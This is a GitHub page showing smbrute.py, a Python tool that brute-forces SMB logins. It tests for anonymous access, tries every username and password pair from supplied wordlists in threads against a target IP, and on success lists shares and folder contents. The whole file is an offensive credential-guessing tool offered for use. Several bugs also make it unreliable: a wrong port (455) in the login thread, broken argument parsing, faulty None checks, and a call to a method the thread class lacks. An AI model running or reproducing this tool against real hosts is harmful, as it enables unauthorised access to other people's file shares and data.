forked from mlynchcogent/SMBrute
-
Notifications
You must be signed in to change notification settings - Fork 1
/
smbrute.py
151 lines (140 loc) · 4.78 KB
/
smbrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python3
# Coded by Momo Outaadi (M4ll0k)
# https://github.com/m4ll0k
import re
import sys
import getopt
from time import sleep
from threading import Thread
from smb.SMBConnection import SMBConnection
from humanfriendly.tables import format_pretty_table
class thread(Thread):
def __init__(self,kwargs):
Thread.__init__(self)
self.user = kwargs['user']
self.passwd = kwargs['passwd']
self.target = kwargs['host']
self.timeout = kwargs['timeout']
def run(self):
while True:
try:
smb = SMBConnection(username = self.user,
password = self.passwd, my_name='', remote_name='', domain='',
use_ntlm_v2 = True, is_direct_tcp=True)
resp = smb.connect(self.target,455,timeout=self.timeout)
except Exception as e:
exit(0)
if resp:
print('[+] Username: %s'%self.user)
print('[+] Password: %s'%self.passwd)
self.Info(smb)
exit(0)
class SMBrute(object):
def banner(self):
print(" _____ _____ _____ _ ")
print("| __| | __ |___ _ _| |_ ___ ")
print("|__ | | | | __ -| _| | | _| -_|")
print("|_____|_|_|_|_____|_| |___|_| |___|\n")
print("SMBrute - SMB Protocol Bruteforce")
print("\tVersion 0.1.0")
print(" Momo Outaadi (M4ll0k)\n")
print("-"*40)
def usage(self):
self.banner()
print("Usage: smbrute.py [OPTIONS]\n")
print("\t-h --host\tTarget IP")
print("\t-u --user\tSet username")
print("\t-f --folder\tShow folder file")
print("\t-p --passwd\tSet password")
print("\t-U --uwordlist\tUsername wordlist")
print("\t-P --pwordlist\tPassword wordlist")
print("\t-t --timeout\tSet timeout, default 5\n")
exit(0)
def main(self):
kwargs = {
'host':None,'user':None,'passwd':None,'timeout':5,
'uwordlist':None,'pwordlist':None,'folder':None,
}
if len(sys.argv) < 2:
self.usage()
try:
opts,args = getopt.getopt(sys.argv,'h:u:p:f:U:P:t:',
['host=','user=','passwd=','folder=','uwordlist=','pwordlist=',
'timeout=']
)
except getopt.error as e:
self.usage()
self.banner()
for o in args:
if o in ('-h','--host'):kwargs['host']=args[args.index(o)+1]
if o in ('-u','--user'):kwargs['user']=args[args.index(o)+1]
if o in ('-f','--folder'):kwargs['folder']=args[args.index(o)+1]
if o in ('-p','--passwd'):kwargs['passwd']=args[args.index(o)+1]
if o in ('-U','--uwordlist'):kwargs['uwordlist']=args[args.index(o)+1]
if o in ('-P','--pwordlist'):kwargs['pwordlist']=args[args.index(o)+1]
if o in ('-t','--timeout'):kwargs['timeout']=args[args.index(o)+1]
if kwargs['host'] == ('' or None) or not re.search('\d*\.\d*\.\d*\.\d*',kwargs['host']):self.usage()
b,s = self.checkAuth(kwargs['host'])
if b:
print('[+] Host %s authentication disabled'%(kwargs['host']))
if kwargs['folder']:self.showFolder(s,kwargs['folder'])
self.Info(s)
else:
print('[-] Host %s authentication enabled'%(kwargs['host']))
if not kwargs['uwordlist'] and not kwargs['pwordlist']:
print('[!] Please set wordlist for bruteforcing')
exit(0)
print('[+] Start bruteforcing...')
if kwargs['uwordlist']!=('' or None):uwordlist=self.readfile(kwargs['uwordlist'])
if kwargs['pwordlist']!=('' or None):pwordlist=self.readfile(kwargs['pwordlist'])
for user in uwordlist:
for passwd in pwordlist:
sys.stdout.write('[+] Username: %s Password: %s\r\r'
%(user.decode('utf-8'),passwd.decode('utf-8')))
sys.stdout.flush()
kwargs['user'] = user
kwargs['passwd'] = passwd
t = thread(kwargs)
t.daemon = True
t.start()
sleep(0.001)
t.join()
print('\n[!] Not found credentials in wordlist')
exit(0)
def readfile(self,path):
return [l.strip() for l in open(path,'rb')]
def checkAuth(self,host):
try:
smb = SMBConnection('','','','',use_ntlm_v2=True,is_direct_tcp=True)
resp = smb.connect(host,445)
return resp,smb
except Exception as e:
print('[ERROR] %s'%e)
exit(0)
def showFolder(self,smb,path):
print('[+] Show %s Files...'%(path))
names = []
column = ['Filename','ReadOnly']
try:
dir_ = smb.listPath(path,'/')
except Exception as e:
print('[!] Failed to list \ on %s: Unable to connect to shared device'%path)
exit(0)
for file in dir_:
names.append([file.filename,file.isReadOnly])
print(format_pretty_table(names,column))
exit(0)
def Info(self,smb):
print('[+] Showing folders..')
names = []
column = ['Name','Type','Comments']
shares = smb.listShares()
for share in shares:
names.append([share.name,share.type,share.comments])
print(format_pretty_table(names,column))
if __name__ == "__main__":
try:
SMBrute().main()
except KeyboardInterrupt as e:
print('[!] Keyboard Interrupt by User!!')
exit(0)